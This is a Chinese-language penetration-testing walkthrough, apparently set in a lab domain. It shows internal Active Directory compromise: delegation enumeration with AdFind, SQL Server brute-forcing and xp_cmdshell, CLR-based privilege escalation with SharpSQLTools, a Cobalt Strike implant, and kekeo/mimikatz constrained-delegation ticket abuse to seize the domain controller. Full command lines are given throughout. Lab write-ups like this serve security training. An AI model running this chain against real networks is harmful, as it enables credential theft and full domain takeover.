msf战队|渗透实战：内网域渗透( 四 )

这里用到了约束委派攻击的知识，简单来说，在Windows系统中，普通用户的属性中没有委派（Delegation）这个选项卡，只有服务账号、主机账号才有。服务账号（Service Account），域内用户的一种类型，服务器运行服务时所用的账号，将服务运行起来并加入域。例如MS SQL Server在安装时，会在域内自动注册服务账号SqlServiceAccount ，这类账号不能用于交互式登录。（更具体知识要自己补一下）
由于我们已经拿到了一个域用户的账户密码，尝试查找约束委派的用户：
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b
\"DC=redteamDC=red\" -f \"(&(samAccountType=805306368)(msds-
allowedtodelegateto=*))\"
cn distinguishedName msds-allowedtodelegateto

sqlserver 的用户是被设置了约束委派，但还需要密码；之前知道1433是开放的，爆破一波试试；

这样就可以执行xp_cmdshell 命令了；

发现权限很小只是一个普通服务权限，下面开始提权；
使用 SharpSQLTools 开启目标 clr：（要用Proxifier挂上代理，就不截图了）
SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami

然后启用并调用命令：
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami

提取成功。
下面用msf来进行文件上传；

上传一个CS的木马；

然后在用高权限来运行cs木马；

成功上线；

抓取下密码；

至此，数据库服务器渗透结束，下面开始对域控的渗透。
域控经过前面的分析，这里就是纯粹的利用约束委派拿下域控。
1、利用 kekeo 请求该用户的 TGT：
TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi
kekeo.exe \"tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi\"
2、然后使用这张 TGT
(TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi) 获取域机器的 ST：
TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam
.red@REDTEAM.RED.kirbi

kekeo.exe \"tgs::s4u
/tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.
RED.kirbi /user:Administrator@redteam.red
/service:cifs/owa.redteam.red\"

3、使用 mimikatz 将 ST2 导入当前会话即可，运行 mimikatz 进行 ptt：
mimikatz kerberos::ptt
TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam
.red@REDTEAM.RED.kirbi

成功拿到域控权限；
【msf战队|渗透实战：内网域渗透】